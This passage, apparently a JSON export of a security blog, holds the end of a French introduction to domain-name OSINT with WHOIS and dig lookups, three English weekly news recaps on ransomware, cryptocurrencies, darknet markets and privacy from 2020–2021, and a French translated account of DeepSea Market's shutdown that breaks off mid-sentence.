y a dix heures. Nous savons qui est le déclarant et comment le contacter. Ce champ est cependant à traiter avec prudence. Les registraires de domaines n\u0026rsquo;effectuent généralement aucune vérification de l\u0026rsquo;identité du déclarant, donc quelque chose de totalement incorrect pourrait être enregistré. De plus, il existe un certain nombre de registraires qui permettent aux clients de masquer leurs informations dans le registre. Nous savons quels serveurs hébergent les zones DNS (c\u0026rsquo;est-à-dire les serveurs qui stockeront les différentes entrées DNS pour ce domaine). Un autre usage naïf de ces informations pourrait aussi être d\u0026rsquo;essayer de prouver que deux domaines sont exploités par la même entité : avoir les mêmes informations dans le whois est un élément qui aiderait à soutenir cette hypothèse.\nUtilisation des requêtes DNS # Les requêtes WHOIS sont intéressantes car elles peuvent nous donner des informations générales sur le propriétaire du domaine et où/quand il a enregistré le domaine, mais il est possible d\u0026rsquo;obtenir plus d\u0026rsquo;informations en examinant les entrées DNS.\nSur Linux/macOS, nous pouvons utiliser la commande dig pour nous aider à recueillir des informations. La syntaxe est assez simple :\ndig MX domain.tld montrera quel(s) serveur(s) sont configurés pour recevoir les emails pour ce domaine. dig MX sub.domain.com @1.1.1.1 fera la même chose que l\u0026rsquo;exemple précédent, mais demandera spécifiquement cette information au serveur DNS 1.1.1.1. Sans entrer dans les spécificités du DNS (Cloudflare a une excellente documentation si vous voulez en savoir plus), il existe plusieurs types d\u0026rsquo;entrées DNS qui peuvent être configurées pour divers cas d\u0026rsquo;usage. Parmi les plus courants (cette page montre une liste plus exhaustive de tous les types existants) :\nA : pour obtenir l\u0026rsquo;adresse IPv4 associée au domaine AAAA : identique à A mais pour IPv6 CNAME : pour définir des alias. Par exemple, si nous avons un domain.tld avec une entrée DNS A pointant vers 123.123.123.123, nous pourrions créer une entrée CNAME pour dire que www.domain.tld devrait pointer vers domain.tld. De cette façon, si nous voulons changer le serveur utilisé pour notre service, nous ne devons modifier que l\u0026rsquo;entrée de domain.tld. NS : pour définir les serveurs de noms en charge du stockage de la configuration DNS du domaine MX : pour obtenir l\u0026rsquo;adresse du serveur de messagerie TXT : pour partager du texte descriptif Les quatre premiers éléments de cette liste peuvent être utiles, mais les types les plus intéressants sont MX et TXT.\nEntrées DNS de type MX # Une requête MX via la commande dig retournera quelque chose ressemblant à l\u0026rsquo;exemple suivant (où j\u0026rsquo;ai exécuté un dig MX mozilla.com).\n;; ANSWER SECTION: mozilla.com.\t60\tIN\tMX\t5 alt1.aspmx.l.google.com. mozilla.com.\t60\tIN\tMX\t5 alt2.aspmx.l.google.com. mozilla.com.\t60\tIN\tMX\t10 aspmx3.googlemail.com. mozilla.com.\t60\tIN\tMX\t1 aspmx.l.google.com. Il n\u0026rsquo;y a pas beaucoup d\u0026rsquo;informations, mais nous pouvons en extraire que Mozilla a plusieurs serveurs capables de recevoir des emails.\naspmx.l.google.com, qui a une valeur de priorité de 1 alt1.aspmx.l.google.com et alt2.aspmx.l.google.com, qui ont une priorité de 5 aspmx3.googlemail.com, qui a une valeur de priorité de 10 La priorité est utilisée pour déterminer à quel serveur les emails doivent être envoyés. Plus le nombre de priorité est bas, plus la priorité est élevée. En pratique, cela signifie que si vous essayez d\u0026rsquo;envoyer un email à Mozilla, le fournisseur de messagerie essaiera d\u0026rsquo;abord de contacter aspmx.l.google.com, si ça ne fonctionne pas alt1.aspmx.l.google.com, et si ça ne fonctionne toujours pas aspmx3.googlemail.com.\nLe point important ici est que ce champ nous permet d\u0026rsquo;obtenir plus d\u0026rsquo;informations sur notre cible. Spécifiquement, quel service elle utilise pour recevoir les emails. Dans notre exemple, nous pouvons voir que Mozilla utilise Google Mail. Parfois, les domaines ont des configurations plus imaginatives (par exemple, utilisant plusieurs fournisseurs), ce qui peut aider à lier des noms de domaine entre eux.\nEntrées DNS de type TXT # De manière similaire aux entrées de type MX, les entrées TXT sont utiles car nous pouvons obtenir plus d\u0026rsquo;informations sur les services utilisés par notre cible, puisqu\u0026rsquo;elles sont souvent utilisées pour prouver la propriété d\u0026rsquo;un nom de domaine à des services tiers.\nPar exemple, si nous interrogeons les entrées TXT pour google.com, twitter.com et apple.com, nous pouvons voir que les lignes suivantes font partie des réponses (tronquées pour améliorer la lisibilité)\n;; ANSWER SECTION: google.com.\t3600\tIN\tTXT\t\u0026#34;docusign=[code]\u0026#34; google.com.\t3600\tIN\tTXT\t\u0026#34;facebook-domain-verification=[code]\u0026#34; google.com.\t3600\tIN\tTXT\t\u0026#34;google-site-verification=[code]\u0026#34; google.com.\t3600\tIN\tTXT\t\u0026#34;apple-domain-verification=[code]\u0026#34; ;; ANSWER SECTION: twitter.com.\t3600\tIN\tTXT\t\u0026#34;google-site-verification=[code]\u0026#34; twitter.com.\t3600\tIN\tTXT\t\u0026#34;adobe-idp-site-verification=[code]\u0026#34; twitter.com.\t3600\tIN\tTXT\t\u0026#34;atlassian-domain-verification=[code]\u0026#34; ;; ANSWER SECTION: apple.com.\t3600\tIN\tTXT\t\u0026#34;adobe-idp-site-verification=[code]\u0026#34; apple.com.\t3600\tIN\tTXT\t\u0026#34;webexdomainverification.8GVC5=[code]\u0026#34; apple.com.\t3600\tIN\tTXT\t\u0026#34;cisco-ci-domain-verification=[code]\u0026#34; Cela nous permet d\u0026rsquo;apprendre que Google utilise probablement Docusign pour signer des contrats, que Twitter utilise Atlassian (peut-être pour stocker du code ou de la documentation), que Twitter et Apple utilisent Adobe Enterprise, et enfin, qu\u0026rsquo;Apple fait des visioconférences en utilisant Cisco Webex.\nTous ces éléments nous aident à mieux comprendre ce qu\u0026rsquo;utilise notre cible, et où nous pourrions creuser pour essayer de trouver plus d\u0026rsquo;informations (ou des services à tenter d\u0026rsquo;exploiter si nous avons l\u0026rsquo;intention de faire du test d\u0026rsquo;intrusion).\nInformations historiques # Nous savons maintenant comment obtenir des informations pour un domaine dans son état actuel, mais il existe un outil supplémentaire qui peut être utile lors d\u0026rsquo;une enquête : les données historiques. Certains des avantages sont :\nMême si les informations de contact du WHOIS sont masquées maintenant, il est possible que le propriétaire ne l\u0026rsquo;ait pas activé lors de la création du domaine. Si nous enquêtons sur plusieurs noms de domaine et essayons d\u0026rsquo;établir un lien, alors regarder les données historiques pour tous et voir que des données similaires ont changé en même temps peut être un bon indicateur. Cela nous permet d\u0026rsquo;avoir une idée de l\u0026rsquo;usage du domaine à un instant t. Les données historiques étant assez précieuses, la plupart des bons services nécessitent un paiement (et ils ne sont généralement pas bon marché). Quelques options gratuites sont :\nspyse.com : historique assez complet des entrées DNS et des sous-domaines utilisés whoisrequest.com : ne montre que le changement de serveurs de noms au fil du temps securitytrails.com : données historiques des enregistrements DNS et sous-domaines osint.sh : données historiques WHOIS. Héberge aussi quelques outils utiles viewdns.info : boîte à outils pratique mais peu de données historiques (dans une certaine mesure, le Reverse Whois lookup qui permet de rechercher des domaines par nom de propriétaire) whoxy.com : historique WHOIS gratuit, avec certaines limites de débit whoisology.com : un peu d\u0026rsquo;historique WHOIS gratuit pour les membres inscrits whoisxmlapi.com : possibilité d\u0026rsquo;obtenir un peu d\u0026rsquo;historique WHOIS avec la démo De plus, il est possible de tirer parti de la WayBack Machine et de services similaires pour interroger des boîtes à outils DNS. Par exemple, le lien suivant permet de voir le WHOIS de Facebook tel qu\u0026rsquo;il était en 2013. Un inconvénient de cette méthode est que les noms de domaine qui n\u0026rsquo;appartiennent pas à des services largement utilisés sont moins susceptibles d\u0026rsquo;être archivés.\nCrédits : # Photo de couverture par Scott Graham sur Unsplash ","date":"2021-09-22","externalUrl":null,"permalink":"/fr/posts/2021/osint-from-domain-names-using-dns-an-introduction/","section":"Articles","summary":"Les noms de domaine génèrent beaucoup d’OSINT dont vous pouvez tirer parti. Apprenons quels sont les éléments à examiner.","title":"OSINT à partir des noms de domaine en utilisant le DNS - Une introduction","type":"posts"},{"content":"Between a ransomware attack blocking an oil pipeline in the US, and new vulnerabilities found in the WiFi standard, plenty of things happened this week again in the cryptocurrencies, darknet, security, and privacy spaces. Find out more in our weekly news recap, in less than a thousand words.\nCryptocurrencies # Tesla Stopped Accepting Bitcoin (Twitter, Elon Musk)\nDespite starting allowing Bitcoin as a payment method in February this year, Elon Musk, Tesla\u0026rsquo;s CEO, announced that Tesla suspended accepting the cryptocurrency amid alleged concerns about the rapid use increase of fossil fuels for Bitcoin mining. Nevertheless, Musk said he still believes cryptocurrencies have a promising future and that Tesla will not sell any Bitcoins, as it intends to \u0026ldquo;use it for transactions as soon as mining transitions to more sustainable energy\u0026rdquo;. Tesla is \u0026ldquo;looking at other cryptocurrencies that us \u0026lt;1% of Bitcoin\u0026rsquo;s energy/transaction\u0026rdquo;, he added. After this announcement, Bitcoin\u0026rsquo;s price fell by a few thousand dollars.\nDarknet # Tracking One Year of Malicious Tor Exit Relay Activities (Part II) (Medium - Nusenu)\nA researcher tracked an entity attacking Tor users. Discovered in August 2020, the attackers controlled, on average more than 14% of the exit relays. The percentage reached 27% this February, and they even tried to add 1,000 exit relays to the network in early May.\nDreaming At Dusk (Tor Project Blog)\nDusk, the first onion service ever created, is now being auctioned. The winner will become the owner of a generative art piece derivated directly from Dusk\u0026rsquo;s private key, which he will also obtain.\nGeneral Security # DarkSide Ransomware Gang Quits After Servers, Bitcoin Stash Seized (Krebs on Security)\nThe DarkSide ransomware caused much uproar this week, as it was responsible for a six-day outrage at Colonial Pipeline, causing fuel shortages and price spikes across the US. After that, the group announced by Telegram that their servers were seized and their cryptocurrencies sent to an unknown account. Colonial Pipeline allegedly paid USD 5 million to get back access to their infrastructure.\nDarkSide is a ransomware as a service with potential links to REvil Group, according to FlashPoint. After DarkSide was used on Colonial Pipeline, the group released a statement saying that they are apolitical, and just aim to make money rather than participate in geopolitics. From now, they would \u0026ldquo;introduce moderation and check each company that our partners wants to encrypt to avoid social consequences\u0026rdquo; (see this article).\nFragAttacks: Presentation at USENIX Security \u0026lsquo;21 (YouTube, Mathy Vanhoef)\nA security researcher found multiple designs and implementation flaws impacting the WiFi standard. According to his research, it is likely that every WiFi product is affected by at least one, if not multiple, vulnerabilities. Vanhoef also uploaded a proof of concept on WPA2/WPA3 showing how it is possible to make a victim use malicious DNS servers just by being sent a picture by email and how it is possible to turn on connected power sockets remotely. For more details, Malwarebytes wrote an article, and the paper is also available here.\nKeePass 2.48 update includes an upgraded password database file format (Ghacks)\nKeyPass developers shipped a new version of its password database: KDBX 4.1. This update allows assigning tags to groups, disabling password quality estimations for individual entries, naming custom icons, and a couple of other features. For compatibility purposes, KeePass will keep using the old version of the database by default until the major KeePass ports support the new one. The software will use KDBX 4.1 if one of the new features is used.\nSecurity keys are now supported for SSH Git operations (GitHub Blog)\nGitHub announced that they shipped support for using security keys (such as the Yubikey) when using Git over SSH. Using this feature would allow having the sensitive part of your SSH key stored into the security key, therefore protecting it in the case of a compromised system. Once the key is generated and the setup completed, the only difference when using this feature would be to touch the key when doing Git remote operations.\nPrivacy # WhatsApp to restrict features if you refuse Facebook data sharing (Bleeping Computer)\nA few months earlier, WhatsApp announced that it would change its policy to allow sharing users\u0026rsquo; data with Facebook. At that time, they announced that people would have to choose to either accept the conditions or have their account deleted. However, WhatsApp stated this week that your account would be restricted for a few weeks if you don\u0026rsquo;t accept the new policy. These restrictions would be to only have the ability to answer incoming calls, call back on missed ones, and reply to messages if you have notifications enabled. After that, you won\u0026rsquo;t be able to receive any notifications or do anything before accepting the new terms. Meanwhile, the German data protection agency issued an order banning Facebook from procesing WhatApp user data for the next three months (Bleeping Computer).\nHumanity wastes about 500 years per day on CAPTCHAs. It\u0026rsquo;s time to end this madness (Cloudflare Blog)\nCloudflare announced that they are working on a way to replace traditional captcha. To do so, they are planning to take advantage of hardware security keys (such as Yubikey). Users would just be asked to press the key to clear the challenge instead of bothering with solving a traditional problem.\n","date":"2021-05-15","externalUrl":null,"permalink":"/blog/weekly-news-recap-7/","section":"News","summary":"Between a ransomware attack blocking an oil pipeline in the US, and new vulnerabilities found in the WiFi standard, plenty of things happened this week again in the cryptocurrencies, darknet, security, and privacy spaces. Find out more in our weekly news recap, in less than a thousand words.\n","title":"Weekly News Recap 7","type":"news"},{"content":"After a long time of inactivity, I decided to re-launch the weekly news recap. Without waiting, here\u0026rsquo;s the latest news on APTs, Cryptocurrencies, Darknet, Security and Privacy in less than 1,000 words.\nAPT # China\u0026rsquo;s PLA Unit 61419 Purchasing Foreign Antivirus Products, Likely for Exploitation (Recorded Future)\nUnit 61419 of China\u0026rsquo;s People Liberation Army is reportedly seeking to purchase English-language antivirus software from major security companies in America, Russia and Europe. Insikt Group assesses that there are high chances that these purchases aim to use these antiviruses during the development of malware, to test their ability to evade detection and/or to reverse engineer the antivirus software to find exploitable flaws.\nCryptocurrencies # IRS secures order to serve Kraken with customer data request on cryptocurrency traders (ZDNet)\nIf you traded more than the equivalent of USD 200,000 through Kraken between 2016 and 2020, congratulations. You are now on the IRS\u0026rsquo;s crosshair. The federal court in the Northern District of California will issue a \u0026ldquo;John Doe\u0026rdquo; summons to Kraken to find US taxpayers who failed to declare their gains properly.\nCoinbase to acquire leading institutional data analytics platform, skew (Coinbase Blog)\nCoinbase announced the purchase of Skew, a company offering market analysis for various crypto-currencies assets. With this, Coinbase aims to provide real-time actionable data analytics to its customers to help them make more informed trading decisions.This is not the first time Coinbase purchases a data analytics company. Two years ago, it already purchased Neutrino, an AML provider for crypto-currencies.\nDarknet # 4 arrested in takedown of dark web child abuse platform with some half a million users (Europol)\nBoystown, one of the most prolific children sexual abuse platform was closed by the German police in collaboration with Europol, Netherlands, Sweden, Australia, Canada, and the US law enforcement agencies. 400,000 users were registered to the website, and four arrests were made (three in Germany, one in Paraguay).\nDark Dot Fail: Hacked, Then Back (The Cryptosphere) Interesting thread on the order of events (Twitter)\nLast week, someone hijacked darknetlive.com, dark.fail, and onion.live\u0026rsquo;s domain names. The attacker(s) changed URLs to redirect to malicious URLs (interestingly, they even bothered to generate vanity ones). The domains were apparently taken over using fake court orders, but as of May 5th, it seems that all were able to regain their domain names.\nAurora Market Exit Scammed\nAurora Market exit scammed the 25 March after its experienced deposits/withdrawal issues, and Aurora, its administrator, stopped showing any sign of life. The market was six months old, and about 200,000 (USD probably) were stolen, according to Northernlight, an administrator.\nGeneral Security # Apple fixes 2 iOS zero-day vulnerabilities actively used in attacks (Bleeping Computers)\nOn May 3rd, Apple released security updates related to the Webkit engine within all of its devices. The two vulnerabilities, CVE-2021-30663 and CVE-2021-30665 allow remote code execution, and were reportedly actively exploited.\nInsurer AXA says it will no longer cover ransomware payments in France (Bitdefender - Hot for Security)\nAXA, one of the most prominent French insurances, announced that they would no longer offer cyber-insurance policies that cover ransom payments. Estimations say ransomware led to more than USD 5.5 billion of losses last year in France.\nPrivacy # Facebook bans Signal\u0026rsquo;s attempt to run transparent Instagram ad campaign (ZDNet)\nSignal, the end to end encrypted app, purchased some advertisement on Instagram, which they used to show people the amount of very specific data advertisers can access. For example: \u0026ldquo;You got this ad because you\u0026rsquo;re a K-pop loving chemical engineer. This ad used your location to see you\u0026rsquo;re in Berlin. And you have a new baby. And you just moved. [\u0026hellip;]\u0026rdquo;. No need to say that Facebook wasn\u0026rsquo;t so fond of their initiative and promptly shut them down.\nNew safety section in Google Play will give transparency into how apps use data (Google Blog)\nGoogle announced that they will make developers communicate how they use users data. The company will also highlight things such as the security practices implemented by the app (e.g., encryption), which data needs to be shared for the app to work, if the app enables users to request data deletion if they delete the app, and a couple of other things. This will be available starting Q1 2022, and developers will have up to the second quarter of the same year to update the required information.All of this is very good, but let\u0026rsquo;s not forget that Google enabled Android is a spyware itself.\nTwitter Tip Jar may expose PayPal address, sparks privacy concerns (Bleeping Computers)\nTwitter has recently begun tests of a new feature, \u0026lsquo;Tip Jar\u0026rsquo;, that aims to let users tip other Twitter accounts they want to support through Paypal, Bandcamp, Patreon, Cash App, and Venmo. For now, the feature is only rolling out to accounts having English set as their language, and only a limited group of users can receive tips. This feature is just a couple of days old that there are already problems, such as the sender\u0026rsquo;s PayPal shipping address being exposed.\n","date":"2021-05-08","externalUrl":null,"permalink":"/blog/weekly-news-recap-6/","section":"News","summary":"After a long time of inactivity, I decided to re-launch the weekly news recap. Without waiting, here’s the latest news on APTs, Cryptocurrencies, Darknet, Security and Privacy in less than 1,000 words.\n","title":"Weekly News Recap 6","type":"news"},{"content":"This week was busy again, with a lot of news to report on. Hackers managed to get access to the US government elections system, OKEx, a cryptocurrencies exchange, froze withdrawals after one of its keyholders was detained by the police, and law enforcement arrested fourteen members of a large criminal network carrying on money laundering. DeepSea Market is potentially gone in an exit scam, and criminal got their hands on data belonging to Ubisoft and Crytek, and leaked some of their data. Finally, a lot to unroll on the privacy side, such as Google receiving warrants for the list of people searching specific keywords in the search engine.\nLearn more about the news worthy events of this week, all summarized in this article, in just a bit more than a thousand words.\nAPT # Hackers used VPN flaws to access US govt elections support systems\nThe US Cybersecurity and Infrastructure Security Agency (CISA) says that an APT used the recent Windows Zerologon vulnerability as well as several VPN vulnerabilities to target federal and local government networks, elections organizations, and critical infrastructures. The APT managed to get access to some election systems but reportedly did not manage to take advantage of it. Furthermore, the FBI and CISA claim that \u0026ldquo;it does not appear these targets are being selected because of their proximity to elections information\u0026rdquo;, while acknowledging the threat.\nIranian state hacker group linked to ransomware deployments\nSecurity researchers claim they linked the Thanos ransomware to an Iranian APT known as MuddyWater. While investigating security incident within big Israeli corporations, the researchers linked the attacks to the APT.There are two ways the instructions were carried on. Option one: MuddyWater would use phishing emails with malicious PDF/Excel documents which would install a malware downloaded from a server belonging to the attackers. As for option two: the APT would use the CVE-2020-068 on unpatched Microsoft Exchange servers and install the same malware as in option one.The researchers claim that the malware installed in both cases was a strain seen before, and was used to install the Thanos ransomware earlier in September.\nCryptocurrencies # OKEx Suspends Withdrawals, Says Key Holder Not Available Due to Cooperation With Investigation\nOKEx, a Malta-based cryptocurrency exchange, temporarily froze withdrawals this Friday. This is allegedly due to one of the exchange\u0026rsquo;s key holder being apprehended by the police. The keyholder being unavailable is preventing the exchange from getting appropriate permissions to proceed to withdrawals. The keyholder might be one of the founders, Xu, which hasn\u0026rsquo;t been seen after being taken by the police at least one week ago.\nOfficials Announce International Operation Targeting Transnational Criminal Organization QQAAZZ that Provided Money Laundering Services to High-Level Cybercriminals\nThe US District of Pennsylvania charged fourteen members of QQAAZZ (a criminal organization), and more than forty houses in Latvia, Bulgaria, the United Kingdom, Spain and Italy, in an investigation involving 16 countries. Since 2016, the group allegedly laundered (or tried to launder) tens of millions of dollars liked to cybercrime. An extensive Bitcoin mining operation associated with QQAAZZ was also seized in Bulgaria.The organization network opened and maintained hundred of corporate and personal bank accounts at financial institutions to receive funds from their customers. QQAAZZ would then transfer the funds to other bank accounts under their control, and sometimes, convert them to cryptocurrencies and use tumbling services. The criminals would then take a fee up to 40 to 50 percent, and return the funds to their customers.Among others, criminals behind significant malware families such as Dridex and Trickbot used QAAZZ to launder their funds.\nDarknet # DeepSea Market Possibly Exit-Scammed, Continuing the Recent Streak of Admins Disappearance\nOn October 14, Atlantic, one of the moderators of DeepSea Market, announced that the market was probably gone for good in a possible exit scam. DeepSea went offline two days before that, on October 12, and it seems that nobody heard from the admin since then. A couple of hours before the service went dark, the admin reportedly processed the vendors\u0026rsquo; withdrawals.\nFentanyl Vendor “Chemsusa” Sentenced to 210 Months in Prison\nRichard Castro, a.k.a. Chemsusa, an Alphabay and Dream Market fentanyl vendor was sentenced to 17.5 years in prison. He reportedly received at least $1.8 million and been involved in at least 5,000 transactions within a couple of years.Law enforcement managed to track the vendor by making transactions with him. From there, they found his Bitcoin wallet which was part of a cryptocurrencies exchange and analyzed the video surveillance of the post office from where the order was sent.Casto reportedly accessed the cryptocurrency exchange as well as the email address he used in relation with his business from his home IP address.\nGeneral Security # Ubisoft, Crytek data posted on ransomware gang\u0026rsquo;s site\nEgregor, a ransomware gang, leaked data allegedly obtained from Ubisoft\u0026rsquo;s and Crytek\u0026rsquo;s internal networks.The criminals leaked 300 Mb of data belonging to Crytek and claims to have encrypted their data during the attack. The leak contained material regarding the development process of games like Arena of Fate and Warface. Ubisoft, on the other hand, allegedly didn\u0026rsquo;t suffer from any encryption on their infrastructure, and only 20 Mb of data was leaked. The group might have got their hands on Watch Dogs: Legion, a game scheduled for next month.The criminals claimed not to be in discussion with any of the two companies at the moments and threatened to publish the source code of Watch Dogs, and Ubisoft engine if they are not contacted.\nCritical Flash Player Flaw Opens Adobe Users to RCE\nAdobe Flash is in the death row, waiting to be killed at this end of this year. Meanwhile, some critical CVEs are still found and patched by Adobe. This week, the company released a security patch for the CVE-2020-9746, which allows an attacker to perform remote code execution simply by visiting a website. An attacker would only have to insert a malicious string in an HTTP response to exploit this vulnerability.\nThe Video conferencing platform Zoom announced the implementation of end-to-end encryption\nZoom, the company making the famous video conference software of the same name, and received some criticism earlier this year related to its security has been working on improving its software. One of these improvements, which is the ability to do end-to-end encrypted calls, will be released next week for both free and paid users. Up to 200 participants will be able to join e2e encrypted meetings.\nPrivacy # International Statement: End-To-End Encryption and Public Safety\nThe US, Japan, Australia, India, the UK, Canada, and New-Zeland issued a joint statement in which they call companies to put backdoors in encryption (specifically end-to-end) so that it is possible to have access to whatever content is shared/accessed. According to them, \u0026ldquo;particular implementations of encryption technology, however, pose significant challenges to public safety\u0026rdquo;. They then proceed to - as usual - mention child abuse and terrorism as reasons why encrypted information should be accessible by the service provider and law enforcement.Even if such measures were implemented, one could argue that not only would it not prevent criminals from communicating through encrypted methods, but it would also make the general public less safe.\nHome security cams hacked in Singapore, and stolen footage sold on adult websites\nClips stolen from more than 50,000 cameras are reportedly being uploaded to pornographic websites and sold online. X-rated footage could be accessed for a $150 fee, and a Discord group with about a thousand member claims that they shared more than 3 TB of footages to at least 70 people.This is a prime example of why you shouldn\u0026rsquo;t have a camera at home, and if you really need one, why you should take appropriate measures to secure it, and not direct it to living areas.\nGoogle Responds to Warrants for “About” Searches\nUS law enforcement is reportedly using warrants to get the list of users that googled specific keywords, that are not only raising privacy concerns but also allegedly resulted in wrong arrests.Google says that these warrants are a rare occurrence and that they fight overly broad or vague requests, and says that these demands represent less than one per cent of those they receive.For reference, according to their transparency report, Google received more than 50,000 requests for users information last year for the US alone. One could argue that about one percent of this value is not \u0026ldquo;a rare occurrence\u0026rdquo;.\nUndocumented backdoor that covertly takes snapshots found in kids\u0026rsquo; smartwatch\nResearchers reportedly found a backdoor in the X4 smartwatch made by a Chinese company and marketed by a Norway-based company.If exploited, this backdoor could allow remote capture of video snapshots, voice-call wiretapping, and real-time location tracking.The backdoor can be exploited by sending SMS, but these would need to be encrypted with a key unique to the device, and sent to the specific number of the phone linked to it.\nMEGA Provided Suspended Account Files to FBI in Child Porn Case\nThe FBI obtained 40 Gb of data from Mega in a case related to child pornography. What is interesting is that it seems that the New-Zealand government has some kind of direct access to some users' account information. It also appears that Mega is keeping a copy of the files associated with accounts disabled for beach of terms of service, but we don\u0026rsquo;t know if they do that in all cases (for example if the account is not disabled by Mega, but deleted by the user).\n","date":"2020-10-17","externalUrl":null,"permalink":"/blog/weekly-news-recap-5/","section":"News","summary":"This week was busy again, with a lot of news to report on. Hackers managed to get access to the US government elections system, OKEx, a cryptocurrencies exchange, froze withdrawals after one of its keyholders was detained by the police, and law enforcement arrested fourteen members of a large criminal network carrying on money laundering. DeepSea Market is potentially gone in an exit scam, and criminal got their hands on data belonging to Ubisoft and Crytek, and leaked some of their data. Finally, a lot to unroll on the privacy side, such as Google receiving warrants for the list of people searching specific keywords in the search engine.\n","title":"Weekly News Recap 5","type":"news"},{"content":"Avertissement : Cet article a été traduit de l\u0026rsquo;anglais par un LLM. La précision n\u0026rsquo;est pas garantie. Vous pouvez lire l\u0026rsquo;article original en anglais.\nLes fermetures de marchés par disparition des administrateurs semblent devenir une tendance ces derniers temps. D\u0026rsquo;abord avec Empire Market fin août, puis Icarus Market en septembre, et maintenant Deep Sea Market, qui a été déclaré probablement définitivement fermé le 14 octobre par l\u0026rsquo;un de ses modérateurs. Cette fois encore, il y a eu de l\u0026rsquo;activité sur le sous-forum officiel du marché, alors déroulons les informations dont nous disposons à ce stade. Notez que les heures mentionnées dans cet article seront en GMT sauf indication contraire.\nLes événements ont commencé le 12 octobre, le marché devenant inaccessible. À 09:26, Atlantic, le responsable Dread de DeepSea Market, a posté sur le forum en disant qu\u0026rsquo;il était au courant de la situation. Il a rapporté avoir parlé avec l\u0026rsquo;administrateur 10 heures plus tôt, et que la conversation était aussi normale que d\u0026rsquo;habitude. Le modérateur a également noté que l\u0026rsquo;administrateur était en ligne sur Jabber « il y a quelques heures », et a poursuivi en disant que les serveurs étaient sous attaque DDoS récemment, donc qu\u0026rsquo;un problème technique s\u0026rsquo;était probablement produit. Rien d\u0026rsquo;inquiétant, d\u0026rsquo;autant qu\u0026rsquo;il affirme que les retraits de la veille avaient été traités comme prévu.\nDeep Sea est hors ligne - Premier message Quelques heures plus tard, à 13:33, le modérateur a publié un nouveau fil sur le sous-forum officiel de Dread : « Le marché et l\u0026rsquo;administrateur sont toujours hors ligne, oui je suis un peu inquiet mais très optimiste. ». À ce moment-là, la liste des miroirs était toujours en ligne, mais le marché était en panne. Le message n\u0026rsquo;offre pas beaucoup d\u0026rsquo;informations, mais Atlantic a dit que l\u0026rsquo;administrateur ne lui parlait qu\u0026rsquo;à certaines heures (pour des raisons de sécurité opérationnelle), il devait donc attendre un peu plus avant de lui parler. Notez qu\u0026rsquo;il a dit qu\u0026rsquo;il était normal pour lui de ne pas parler à l\u0026rsquo;administrateur à cette heure, mais qu\u0026rsquo;il était tout de même « un peu inquiet ».\nDeuxième mise à jour de Deep Sea - Inquiet mais optimiste Notez qu\u0026rsquo;il y a un ensemble de commentaires intéressants. Un utilisateur mentionne que l\u0026rsquo;administrateur traite habituellement les retraits toutes les 4 heures, ce qui devrait correspondre à peu près au moment où le commentaire est fait (13:44). Atlantic confirme, mais dit que l\u0026rsquo;administrateur n\u0026rsquo;utilise pas Jabber à cette heure (pour éviter d\u0026rsquo;être distrait). Un autre utilisateur (un vendeur vérifié) a dit qu\u0026rsquo;il avait reçu un retrait aux alentours de 5:00 le même jour.\nCommentaires sur les retraits Le troisième message de mise à jour est arrivé quelques heures plus tard, à 18:45. Atlantic dit avoir vu l\u0026rsquo;administrateur sur Jabber à 6:30, et que celui-ci aurait traité des retraits plus tôt. Selon ses sources, quelqu\u0026rsquo;un a engagé des attaquants DDoS, qui ont attaqué le marché pendant la nuit.\nTroisième mise à jour - Pas de grande nouvelle Encore une fois, nous pouvons noter des vendeurs affirmant avoir reçu leurs retraits dans les commentaires.\nCommentaire d\u0026rsquo;un vendeur - Publié le 12 octobre à 18:58 Commentaire d\u0026rsquo;un vendeur - Publié le 12 octobre à 20:15 Vingt et une heures après que l\u0026rsquo;administrateur ait disparu, Atlantic a publié une nouvelle mise à jour (le 13 octobre à 04:51). Il a dit qu\u0026rsquo;il avait réussi à parler avec un autre modérateur (qu\u0026rsquo;il n\u0026rsquo;a pas nommé), mais le modérateur n\u0026rsquo;avait aucune idée de ce qui se passait non plus.\nQuatrième mise à jour - Toujours rien de nouveau Un autre utilisateur a posté dans les commentaires (à 08:50) que son retrait avait été traité à 6:21.\nUn utilisateur affirme avoir reçu des fonds Quarante heures après que le marché et l\u0026rsquo;administrateur soient passés hors ligne, Atlantic a publié une nouvelle mise à jour (le 13 octobre à 19:18), où il a dit qu\u0026rsquo;il commençait à être stressé. Dans ce message, il a légèrement changé le discours qu\u0026rsquo;il tenait au début. Il est passé de quelque chose comme « tout allait bien quand j\u0026rsquo;ai parlé à l\u0026rsquo;admin pour la dernière fois » à dire qu\u0026rsquo;il était connecté au marché et que tous les miroirs (y compris un privé) sont passés hors ligne quand l\u0026rsquo;administrateur s\u0026rsquo;est déconnecté de Jabber. Il a dit avoir pu parler à un modérateur senior (probablement Melanocetus ou Greyshark, respectivement « Senior Mod » et « Head of Operations » sur le sous-forum Dread) qui n\u0026rsquo;avait aucune idée de ce qui se passait non plus. À ce stade, Atlantic affirme être convaincu que ce n\u0026rsquo;est pas un exit scam, car (entre autres) le marché avait dépensé beaucoup d\u0026rsquo;argent en réseaux publicitaires et mises à jour de serveurs une semaine plus tôt.\nCinquième mise à jour - De plus en plus stressé Dans les commentaires, nous apprenons que seul l\u0026rsquo;administrateur avait accès aux serveurs, donc le reste du staff ne peut pas tout remettre en ligne.\nLes modérateurs n\u0026rsquo;ont pas accès à l\u0026rsquo;infrastructure du marché Deux jours après que tout soit devenu sombre, vient le coup final, aujourd\u0026rsquo;hui, le 14 octobre à 07:25, Atlantic dit que le marché a probablement disparu pour de bon, mais qu\u0026rsquo;il croit toujours qu\u0026rsquo;il ne s\u0026rsquo;agit pas d\u0026rsquo;un exit scam, car cela n\u0026rsquo;aurait pas de sens pour l\u0026rsquo;administrateur d\u0026rsquo;investir 35 000 dollars quelques jours avant de faire cela.\nSixième mise à jour - Le marché a probablement disparu Si nous considérons les événements, il n\u0026rsquo;y a pas de contradictions en ce qui concerne la chronologie. Atlantic dit avoir parlé à l\u0026rsquo;administrateur aux alentours du 12 à 00:00, et que celui-ci était en ligne quelques heures avant le premier message de mise à jour sur Dread, à 9:26. Selon les commentaires, certains utilisateurs ont reçu de l\u0026rsquo;argent aux alentours de 6:00 et 7:00. Le premier message se plaignant de la fermeture du marché a été publié sur le sous-forum à 07:50.\nBien sûr, nous avons vu avec l\u0026rsquo;exit scam d\u0026rsquo;Icarus que les propos d\u0026rsquo;un modérateur ne pouvaient pas être totalement fiables, mais si l\u0026rsquo;administrateur a effectivement fait de gros investissements quelques jours avant la fermeture, et si (comme le disent plusieurs sources dans les commentaires) l\u0026rsquo;administrateur a bien traité les retraits des vendeurs avant de tout fermer, alors rien n\u0026rsquo;a beaucoup de sens.\nJe peux penser à quelques possibilités sur ce qui s\u0026rsquo;est passé, 